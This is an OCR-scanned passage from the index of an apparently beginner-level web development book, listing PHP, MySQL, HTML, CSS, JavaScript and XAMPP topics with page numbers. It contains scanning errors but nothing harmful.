overview, 574-576 
of radio buttons, 579-580 
of required fields, 576-579 
of text, 579 
of URLs, 582 

validation functions, creating, 
585-586 


variables 

assigning strings to, 292 
assigning values to, 282-283 
creating, 282-283 
displaying values in, 284-287 
naming, 282 
overview, 281 

removing information from, 283 
session, 437-438 
single versus double quotes 
with, 293 

testing content of, 322 
timestamps, assigning to, 309-310 
using in functions, 347-349 
variable, 283-284 
writing code, 277-278 
PHP scripts 

breaking out of loops, 344-346 
communicating with MySQL, 516-521 
conditional statements, 329-335 
conditions, setting up 
comparing values, 320-322 
joining multiple comparisons, 
327-329 
overview, 320 

pattern matching with regular 
expressions, 323-327 
testing variable content, 322 
display code, separating from logic 
code,357-358 
do. .while loops, 341-342 
include files, organizing with, 
359-363 

infinite loops, avoiding, 343-344 
for loops, 335-339 
MySQL, working with, 515-516 
MySQL errors, handling, 522-523 
mysqli functions, 523-526 
mysqli functions, converting to 
mysql functions, 526-527 
organizing, 357 
overview, 319-320 
reusing code, 358 
selecting MySQL databases 
with, 521 

while loops, 338-341 
PHP tags, 273, 361 


]nde)e 081 


PHP validation 
of check boxes, 579-580 
of drop-downs, 579-580 
e-mail addresses, 581-582 
matching passwords, 582-584 
of numbers, 580-581 
overview, 574-576 
of radio buttons, 579-580 
of required fields, 576-579 
of text, 579 
of URLs, 582 

validation functions, creating, 

585-586 

PHP website, downloading from, 37 
php_value directive, 636 
phpinf o () output, 74 
php. ini file 

disabling functions and classes, 
637-638 

editing, 50-51, 53, 83 
error display, changing, 639 
f ile_uploads setting, 433 
limiting file sizes in, 433 
location of, 83 

making changes outside of, 636 
overview, 635 

resource limits, changing, 639 
security options, setting in, 428 
session parameters, changing, 637 
session timeout, changing, 636-637 
troubleshooting PHP and MySQL 
connections, 73 
working with, 635 
phpMyAdmin utility, 24, 81 
pixels, font sizing by, 136-137 
plus sign (+), 196, 289, 290 
points, font sizing by, 136-137 
port used by Apache, changing, 32, 33 
POST method, 172, 173, 548 
postfix operator (i++), 201 
PostgreSQL databases, enabling 
support for, 45 
pound sign (#), 131, 173 
pref ix=PREFIX option, PHP, 45 
preg_match {) function, 326-327, 430, 
431, 553 


prepended files, starting sessions with, 
532-534 

preventDef ault {) function, 246 
previous Statement, 303 
primary key, 479, 491 
primary selectors, jQuery, 226 
print statements, 278-281, 284-285 
print_r statements, 286, 298 
private keyword, 404 
private properties and methods, 
407-409, 632 

privileges, MySQL accounts, 459, 
461-462, 463, 466-467 
process files, building, 625-628 
programs 

exchanging PHP data with other, 
389-391 

provided by web-hosting companies, 
17 

server-side, 12 
TextEdit, 97 
web server, 8 
properties 

$this variable, accessing with, 
404-405 

adding to objects, 209-210 
background-color, 147 
background-image, 150-154 
background-position, 153 
choosing for OOP scripts, 401-402 
clear, 157 
display, 160 
float, 160 

font-family, 134-135 
font-size, 136-137 
font-style, 126 
font-weight, 126 
isLoggedIn, 612-613, 614-618 
length, 202 
list-style-type, 144 
margin, 157, 158 
overview, 399 
private, 407-409 
property_exists, 422 
pubiic, 407-409 
setting for ciasses, 403-404 
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properties (continued) 
text-decoration, 167 
user Agent, 215-216 
visibility, 161 
width, 157 

propertY_exists function, 422 
protected keyword, 404 
protecting databases, 454-455 
protocol, HTTP, 8-9 
provideFeedback function, 566, 
569-570 

public keyword, 404 
public properties and methods, 
407-409 

Q 

queries, SQL 
building, 451-452 
to see account information, 464 
sending, 452-454 
querying PHP data types, 289 

R 


r mode, 384 
r+ mode, 384 

radio buttons, 170, 178-179, 431, 
579-580 

RDBMS (Relational Database 
Management System), 13, 450, 
477-480 

read mode, opening files in, 385 
readdir function, 370, 371 
reading 
CSV files, 391 

text files, with PHP, 387-390 
ready! ) function, 223-225, 241, 246 
real numbers, 289-291 
redirecting to other pages, 216-217 
referencing 

image locations, 113-114 
passing values to functions by, 
353-354 

refining validation, 568-570 


register_globals setting, 428, 434 
registerUser function, 602 
registration pages 
creating, 593-596 
CSS,597-598 
JavaScript, 596-597 
registration-process PHP pages, 
598-602 

regular expressions, 323-327, 430, 579 
reinstalling XAMPP installation kit, 
84-85 

Relational Database Management 
System (RDBMS), 13, 450, 477-480 
relationships between database tables, 
creating, 480-481 
relative versus absolute links. 111 
reliability of web-hosting 
companies, 16 
Remember icon, 3 
removeAttr () function, 259 
removeClass function, 239-240 
removeFeedback function, 566, 570 
removing 

information from PHP variables, 283 
MySQL accounts, 467-468 
tables from databases, 493 
values from arrays, 299 
rename statement, 369 
repeating background images, 154 
request verification, 459 
require Statements, 360 
require_once statements, 361 
required fields, PHP validation of, 
576-579 

Reset button, adding to web 
forms, 180 

reset process file, creating, 627-628 
reset statement, 303 
reset success pages, 625 
_resetPass method, 632 
resizing images, 114 
resource data types, 288 
resource limits, changing, 639 
restart command, 30 
restarting Apache, 29, 30 
restoring data from backups, 471-473 
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results from functions, returning, 
207-208 

retrieving data from databases 
combining data from separate tables, 
508-513 

overview, 502-503 
specific information, 503-504 
in specific orders, 505 
from specific rows, 505-508 
return keyword, 207 
return Statement, 347, 354-356 
returning 

results from functions, 207-208 
values from PHP functions, 354-356 
reusing PHP code, 358, 535-539 
REVOKE Statement, 467 
root account, 458 
root directory, 366 
root element, HTML documents, 92 
rows 

counting number affected by 
statements, 525 
counting number retrieved by 
queries, 523-524 
retrieving database data from, 
505-508 

RPM files, installing MySQL on Linux 
from, 61-62 
rsort function, 301 
rtrim function, 388 

5 


s date format symbol, 309 
saf e_mode option, 428 
saf e_mode_gid option, 428 
sanitizing user input, 430 
<script> tag, 95, 189 
search engines, use of page titles, 93 
search function, 356 
security 
Apache, 14 

backing up databases, 468-471 
FTP, 378 

include files, 361-362 


MySQL, 454-455, 518 
operating system command issues, 
377-378 
security, PHP 
Apache, securing, 426-427 
overview, 425 

sanitizing variables, 432-436 
securing servers, 425-426 
setting in php. ini, 428 
unexpected input, handling, 
429-432 

select boxes, adding to web forms, 
174-176 

SELECT privilege, 462 
SELECT query, 502-505, 508-513 
SELECT statement, 631 
selected attribute, 175, 176 
selecting elements with j Query, 
225-227 
selectors, CSS 

groups of elements as, 131-134 
individual elements as, 130-131 
overview, 128-129 
selecting HTML elements, 130 
selectors, jQuery, 225-227 
SELinux, 425 
semantic markup, 11, 95 
SERIAL data type, 484 
servers. See also web hosting 
Apache 

advantages of, 14 
checking version of, 42 
configuring, 32-33, 83-84 
configuring for PHP, 47-48, 49 
getting information on, 31 
installing on local computers, 
19-20 

installing PHP on Linux or Unix 
with, 41 

obtaining, 22-24 
overview, 8, 21, 273 
PHP compatability with, 273 
running as service, 85 
securing, 426-427 
starting and stopping, 28-30 
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servers (continued) 

testing web servers, 21-22 
verifying downloaded files, 24-25 
version of, checking, 41 
XAMPP Control Panel, starting and 
stopping with, 78-79 
configuring for PHP, 47-49 
defined, 7 

FTP, logging in to, 379 

general discussion, 8-9 

HTML documents, storing on, 89-90 

installing, 25-28 

installing on local computers, 

19-20 

PHP files, processing of, 271-272 
securing, 425-426 
testing for, 21-22 
server-side programs, 12 
server-side validation, 555, 556 
Service check box, XAMPP Control 
Panel, 85 

servlet support, including, 45 
session cookies, 637 
session_destroY function, 446, 614 
session_id function, 446 
session_name function, 446 
session_start {) function, 

440-441, 532 

session_write_close() 

function, 445 
sessions 
closing, 445 
options for, 446 
overview, 437-438 
parameters, changing, 637 
prepended files, starting with, 
532-534 

session_write_close() 
function, 445 
starting, 440-445 
timeout, changing, 636-637 
SET PASSWORD Statement, 466 
set_time_limit () function, 639 
setcookie {) function, 438-439 
setSession() function, 610 
setTimeout () function, 236 


SHUTDOWN privilege, 462 
shutting down MySQL server, 67 
signatures 

abstract methods, 416 
MD5, 39 

simple statements, 276-277 
single line comments, 263 
single quote (’), 292 
single quotes C ‘), 285 
single-column fixed-width layout, 
155-158 

single-column liquid layout, 157-158 
single-quoted strings, 292-294 
site maps, 163 
size 

of font, setting with CSS, 136-138 
of images, 114 
size attribute, 173 
software 

exchanging PHP data with other, 
389-391 

provided by web-hosting 
companies, 17 
server-side, 12 
TextEdit, 97 
web server, 8 
solid border style, 141 
sort function, 299-300, 301 
sorting arrays, 299-301 

solirrp rorlp 

installing Apache from, 23-24, 27-28 
installing MySQL from, 63-65 
installing PHP from, 38 
output from PHP statements, 279 
spaces 

avoiding in filenames and URLs, 110 
inserting in pages, 99-101 
in SQL, 452 

<span> tag, 95, 126, 127 
special characters 
-, 324 
0,324 
(II), 324 
?, 324 
^ 324 
{ , }, 324 
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changing in Apache, 33 
converting to entities, 432 
escaping, 525-526 
used in patterns, 323-326 
specifying log files, 316 
speed of web-hosting companies, 17 
SQL (Structured Query Language), 
451 

queries, 451-454, 464 
SQL injection, 429-430 
statements, sending to MySQL, 519 
SQL injection, 429-430 
SQLite software, 394-395 
sqlite_querY function, 394-395 
square brackets ([ ]), 296 
square list style, 144 
src attribute, 113, 190, 234 
starting Apache, 29-30 
startingvalue statement, 336 
Startup Wizard, XAMPP, 76-78 
statements 
AddType, 47-48, 49 
beginning statements, in for 
loops, 337 

break, 334, 335, 344-346 
class, 402, 403 
complex, 276-277, 319 
continue, 344-346 
echo, 275-276, 278-281, 284-285, 
287, 298 

else section of if statements, 330 
elseif section of if 
statements, 330 
ending statements, in for 
loops, 338 

GRANT, 465, 466-467 
if statements, 277, 329, 330-333 
include, types of, 360 
include_once, 360-361 
print, 278-281, 284-285 
print_r, 286, 298 
require, 360 
require_once, 361 
simple, 276-277 
SQL, sending to MySQL, 519 


switch, 329, 333-335 
var_dump, 286-287, 289, 298 
statistics, provided by web-hosting 
companies, 17 
stopping Apache, 29, 30 
storage 

data types, 481-484 
of database backups, 468 
of include files, 361-362 
strict messages, 311, 313 
strings 

assigning to variables, 292 
comparing, 321 
defined,288 
double-quoted, 292-294 
joining, 294 

keeping track of words with, 
195-196 

overview, 288, 292 
reading files into, 389 
single-quoted, 292-294 
SQL queries, 452 
storing long, 295 
strtotime Statement, 309-310 
structure 

of databases, 494-495 
MySQL, 450 
of PHP, 273-275 
structure of HTML documents 
body section, 94 
head section, 92-93 
overview, 91-92 
root element, 92 
title elements, 93 
Structured Query Language (SQL) 
queries, 451-454, 464 
SQL injection, 429-430 
statements, sending to MySQL, 519 
<stYle> element, 127 
style sheets 
external, 128-129 
internal, 126-128 
subclasses, 400 
subdomains, 9 

submit event handler, 242-246, 563 
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submit () function, 246, 568-569 
submit input type, 179 
submit type, 170 

submitting web forms, 179-180, 182 
subqueries, 503 
substr () function, 231 
subtraction, 197 

success pages, building, 602-607, 
622-623, 625 
SuExec, 426-427 
support for MySQL, 71-72 
suppressing single error 
messages, 315 

switch statements, 329, 333-335 
syntax, for mysql and mysqli functions, 
527 

syntax, PHP 

complex statements, 276-277 
overview, 275-276 
simple statements, 276-277 
system function, 372, 374-375, 377 
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tab-delimited files, 391-393, 500 

<table> tag, 103 

tables 

adding to databases, 491 
combining data from database, 
508-513 

creating relationships between 
database, 480-481 
database, 450 
HTML, 102-103, 105-108 
RDBMS, 477-480 
tables_priv table, 463 
tabs, in PHP code, 293 
tab-separated values (TSV) files, 
391-393 
tags 

<a>, 94, 108-109, 111-112 
anchor, 94, 108-109, 111-112 
<br>, 94, 99-100 
closing, 91 

<div>, 95, 96, 126, 127-128 


<fieldset>, 172 
<form>, 95, 170, 172-173 
<hl> through <h6>, 95, 96 

HTML,^94-95, 103 
<img>, 95, 113-114 
<input>, 95 

JavaScript, adding to pages, 189 
<label>, 172 
<legend>, 172 
<li>, 103 

<link>, 95, 128-129 
<ol>, 103 
opening, 91 

opening and closing, 91 
<p>, 95, 96 
PHP, 273, 361 
<script>, 95, 189 
<span>, 95, 126, 127 
<table>, 103 
<td>, 103 
<th>, 103 
<tr>, 103 
<ul>, 103 

tarballs, 27, 41, 43, 62, 64 
target attribute, 112 
targeting CSS styles 
background colors, changing, 
147-150 

groups of elements, 131-134 
individual elements, 130-131 
overview, 128-129 
selecting HTML elements, 130 
<td> tag, 103 
Technical Stuff icon, 3 
technical support of web-hosting 
companies, 17 
templates 

bottom of page, 646 
connecting top, middle, and bottom, 
646-650 

extending, 650-653 
general discussion, 641-642 
overview, 641 

template class, creating, 642-643 
top of page, 643-646 
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testing 

with conditionals, 197-200 
CSS accross multiple browsers, 
122-123 
MySQL, 68-69 
PHP, 51-52 

for unexpected input on forms, 
430-431 

variable content, 322 
for web servers, 21-22 
XAMPP installation kit, 79-82 
test. php file, 51-52 
text 

changing with each {) loops, 
230-232 

fonts, styling with CSS 
color, setting, 138-140 
font family, setting, 134-136 
general discussion, 122-126 
overview, 11, 134 
size, setting, 136-138 
inserting in HTML pages, 95-96 
PHP validation of, 579 
text boxes 

counting characters in, 254-257 
creating, 254-255 

preventing character input, 257-259 
TEXT data type, 483 
text editors, 89, 97 
text files, PHP statements for 
accessing files, 384-386 
exchanging data in text files, 390 
overview, 383-384 
reading from, 387-390 
SQLite software, 394-395 
writing to, 386-387 
text () function, 231 
text inputs, adding to web forms, 
173-174 

text strings, 452 
text type, 170 

text-decoration CSS property, 167 
TextEdit program, 97 
<th> tag, 103 


throwing an exception, 419-420 
time data, storing, 482 
TIME data type, 483 
time zones, setting, 83, 307-308 
timeout value for sessions, 443, 
636-637 
times, 307-310 
timestamps, 307, 309-310 
Tip icon, 3 

title elements, HTML documents, 93 
TLD (Top-Level Domain), 9 
toggleClass function, 240 
tokens, 311 

top of page, in templates, 643-646 
Top-Level Domain (TLD), 9 
totalRemaining variable, 256 
<tr> tag, 103 
traversing arrays 
with foreach statement, 304-305 
manually, 303-304 
multidimensional arrays, 306 
overview, 302-303 
troubleshooting 
JavaScript programs 
alerts, 191-193, 262 
comments, 262-264 
Firebug add-on, 264-268 
overview, 261 
MySQL installation, 69-70 
PHP and MySQL connections, 73-74 
PHP installation, 53 
with var_dump statements, 286-287 
XAMPP installation kit, 85 
try block, 420 

TSV (tab-separated values) files, 
391-393 

turning off error messages, 313-314 
Twitter, 541 

two underscores (_^), 407 

two-column fixed-width layout, 
159-161 

two-column liquid layout, 161-162 
type hinting, 406 
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<ul> tag, 103 

undefined function error message, 

53, 73 

uninstalling XAMPP installation kit, 
84-85 

UNION query, 509-510 
Unix 

backing up databases on, 469-471 
case sensitivity with SQL, 452 
checking for MySQL on, 56 
checking for PHP installation on, 36 
getting Apache information on, 31 
installing PHP on, 40-42, 44-45 
obtaining MySQL for, 58-59 
restarting Apache on, 30 
starting Apache on, 29-30 
stopping Apache on, 30 
Unix timestamps, 307, 367, 368 
unlink Statement, 369 
unordered lists, 103-104, 228 
UPDATE privilege, 462 
UPDATE statement, 513, 525 
updating 

database data, 513 
MySQL, 458 
upgrading MySQL, 473 
upload_max_f ilesize directive, 639 
uploading 

with FTP, 380-382, 434-436 
limiting file sizes in php. ini, 433 
preventing, to PHP, 433 
upper-roman list style, 144 
url_f open setting, 434 
URLs 

opening PHP files through, 274 
PHP validation of, 582 
USAGE privilege, 462 
user accounts, MySQL 
adding, 465 

administrator responsibilities 
regarding, 458 
attributes of, 459 
names of, 460-461 


overview, 462, 464 
passwords, 461, 465-466 
privileges, 461-462, 466-467 
removing, 467-468 
seeing information about, 464 
User class, building, 607-610 
user database for login applications 
accessing, 591 
building, 590-591 
designing, 589-590 
overview, 589 
user hijacking, 430 
User objects, creating, 607-611 
user table, 463 
userAgent property, 215-216 
usort function, 301 
utilities 
antivirus, 434 
apxs, 40, 42, 43, 44 
mysqladmin, 67 
mysqldump, 469 
phpMyAdmin, 24, 81 
yum, 23, 37 

V 


val () function, 246-247 
validateEorm {) function, 564, 
568-569 

validateReset () method, 630-631 
validation 

adding to web form, 563-565, 
570-574 
basic, 557-561 
of check boxes, 579-580 
of drop-downs, 579-580 
e-mail addresses, 581-582 
feedback to form users, 565-568 
of files, 433-434 

form validation process, 555-556 
HTML, 116-119 

HTML and CSS on forms, reviewing, 
561-562 

matching passwords, 582-584 
of numbers, 580-581 
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overview, 555, 574-576 
of radio buttons, 579-580 
refining, 568-570 
of required fields, 576-579 
of text, 579 
of URLs, 582 

validation functions, creating, 
585-586 

of web forms, 246-247 
validation functions, creating, 

585-586 

value attribute, 173-174 
values 

assigning to PHP variables, 282-283 
displaying in PHP variables, 284-287 
knowing how long variables 
hold, 286 

passing to PHP functions, 349-354 
removing from arrays, 299 
retrieving from arrays, 301-302 
returning from PHP functions, 
354-356 

walking through in arrays, 302-305 
var keyword, 193-194 
var_dump statements, 286-287, 

289, 298 

VARCHAR data type, 483 
variable variables, 283-284 
variables 
condition, 200 
holding data in, 193-195 
for loops, 200 
postfix operator (i++), 201 
sanitizing, 432-436 
variables, PHP 
assigning strings to, 292 
assigning values to, 282-283 
creating, 282-283 
displaying values in, 284-287 
naming, 282 
overview, 281 

removing information from, 283 
session, 437-438 
single versus double quotes 
with, 293 


testing content of, 322 
timestamps, assigning to, 
309-310 

using in functions, 347-349 
variable, 283-284 
verifying downloaded files, 24-25, 
39, 59 

versions of Apache, 22-23, 41, 42 
viewing arrays, 298-299 
virtual hosts, 427 
Virtual PC for Application 
Compatibility software, 
Microsoft, 122 

visibility CSS property, 161 
Visibone’s Color Lab, 138 

w 


w date format symbol, 309 
w mode, 384 
w+ mode, 384 

W3C Markup Validation Service, 
116-119 

walking through arrays, 302-305, 306 
with foreach statement, 304-305 
manually, 303-304 
multidimensional arrays, 306 
overview, 302-303 
WAMPServer installation kit, 24, 38 
Warning icon, 3 
warning messages, 311, 312 
web browsers 
defined, 7 

detecting with JavaScript, 214-216 
fonts, choosing web-friendly, 
138-140 

general discussion, 8 
JavaScript support, 188, 220 
on mobile devices, 10 
redirecting to other pages, 216-217 
testing CSS across multiple, 

122-123 
Web Fonts, 135 
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web forms. See also validation 
aligning fields with CSS, 180-183 
blank fields, checking for, 246-247 
checkboxes, creating, 176-177 
clearing, 180 

counting characters in text boxes, 
254-257 

creating, 593-602 
creating with OOP, 414-415 
disabling form fields, 257-259 
drop-down boxes, adding, 174-176 
<form> tag, 172-173 
general discussion, 169-170 
input elements of, 170-172 
malicious attacks through, 429-432 
mouse click event handler, adding, 
247-251 
overview, 169 
radio buttons, 178-179 
submit event handler, adding, 
242-246 

submitting, 179-180 
text inputs, adding, 173-174 
unexpected input, handling, 
429-432 
web hosting 
choosing hosts, 14-15 
for company websites, 15-16 
hosted websites, using, 18-19 
overview, 14 

web-hosting companies, choosing, 
16-18 

web page languages 
CSS, 11 
HTML, 10-11 
JavaScript, 11-12 
overview, 10 
web pages 

block-level elements, 98 
body section, 94 
comments, 101-102 
creating, 97-98 

displaying PHP content on, 278-281 
head section, 92-93 
images, adding, 113-116 
inline elements, 98 


links, adding, 108-112 
lists, adding, 102-105 
overview, 7, 91-92 
root element, 92 
tables, 102-103, 105-108 
title elements, 93 
web server languages 
Apache httpd, 13-14 
MySQL, 12-13 
overview, 12 
PHP, 12-13 

web servers. See also web hosting 
Apache 

advantages of, 14 
checking version of, 42 
configuring, 32-33, 83-84 
configuring for PHP, 47-48, 49 
getting information on, 31 
installing on local computers, 
19-20 

installing PHP on Linux or Unix 
with, 41 

obtaining, 22-24 
overview, 8, 21, 273 
PHP compatability with, 273 
running as service, 85 
securing, 426-427 
starting and stopping, 28-30 
testing web servers, 21-22 
verifying downloaded files, 24-25 
version of, checking, 41 
XAMPP Control Panel, starting and 
stopping with, 78-79 
configuring for PHP, 47-49 
defined, 7 

FTP, logging in to, 379 
general discussion, 8-9 
HTML documents, storing on, 89-90 
installing, 25-28 

installing on local computers, 19-20 
PHP files, processing of, 271-272 
securing, 425-426 
testing for, 21-22 
web services 
accepting input, 548-553 
general discussion, 541-542 
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overview, 541 

returning data from databases, 
545-548 

returning dates from, 542-545 
web space, 81 
web-hosting companies 
choosing, 16-18 
overview, 15 
websites 

Apache, obtaining software from, 23 
authenticated pages, adding, 
612-618 

company websites, web hosting for, 
15-16 

confidentiality of, 587 
function files, creating, 591-593 
general discussion, 588 
hosted, 18-19 

login pages, building, 604-607 
MySQL, downloading software 
from, 58 

opening files in other, 386 
overview, 587 
paid access to, 587 
PHP, downloading from, 37 
success pages, building, 602-604 
user database, creating, 589-591 
User objects, creating, 607-611 
web forms, creating, 593-602 
Welcome page, XAMPP, 80 
well-formed pages, 95 
WHERE clause of SELECT query, 505, 
506-508 

while loops, 203, 335, 338-341 
widgets, 188 

width CSS property, 157 
wildcards, in hostnames, 460-461 
Windows, Microsoft. See also XAMPP 
installation kit 

activating MySQL support, 71 
Apache, installing on, 19 
backing up databases on, 469 
checking for MySQL on, 56 
checking for PHP installation on, 36 
configuring web server for PHP, 
47-48 


controlling MySQL server, 66-67 
getting Apache information on, 31 
installing Apache on, 25-26 
installing MySQL on, 20 
installing PHP on, 20, 46 
MySQL Setup Wizard, running on, 
60-61 

obtaining Apache for, 23 
obtaining MySQL for, 58 
obtaining PHP for, 37 
starting and stopping Apache on, 
28-29 

starting MySQL on, 57 
text editors, 97 

troubleshooting PHP and MySQL 
connections, 73, 74 
with-apxs=EILE option, PHP, 45 
with-apxs2=FILE option, PHP, 45 
with-config-filepath^DIR 
option, PHP, 45 

with-mysql=DIR option, PHP, 45 
with-mysqli=DIR option, PHP, 45 
with-oci8=DIR option, PHP, 45 
with-openssl=DIR option, PHP, 45 
with-oracle=DIR option, PHP, 45 
with-pgsql=DIR option, PHP, 45 
with-servlet=DIR option, PHP, 45 
Wordpad, 97 

write mode, opening files in, 385 
writing 

PHP code, 277-278 

to text files, with PHP, 386-387 
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XAMPP installation kit 
Control Panel, using, 78-79 
installing, 76-78 
obtaining, 75-76 
overview, 24, 38, 59, 75 
reinstalling, 84-85 
testing, 79-82 
troubleshooting, 85 
uninstalling, 84-85 
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XAMPP web page 
language options, 80 
testing, 80 

testing phpMyAdmin utility from, 81 
XML (Extensible Markup Language), 
45, 541, 550-553 
xor, in comparisons, 327-329 
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Zip files, PHP, 37, 46 
zlib option, configure 
command, 43 
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Y date format symbol, 309 

Y date format symbol, 309 
yum utility, 23, 37 
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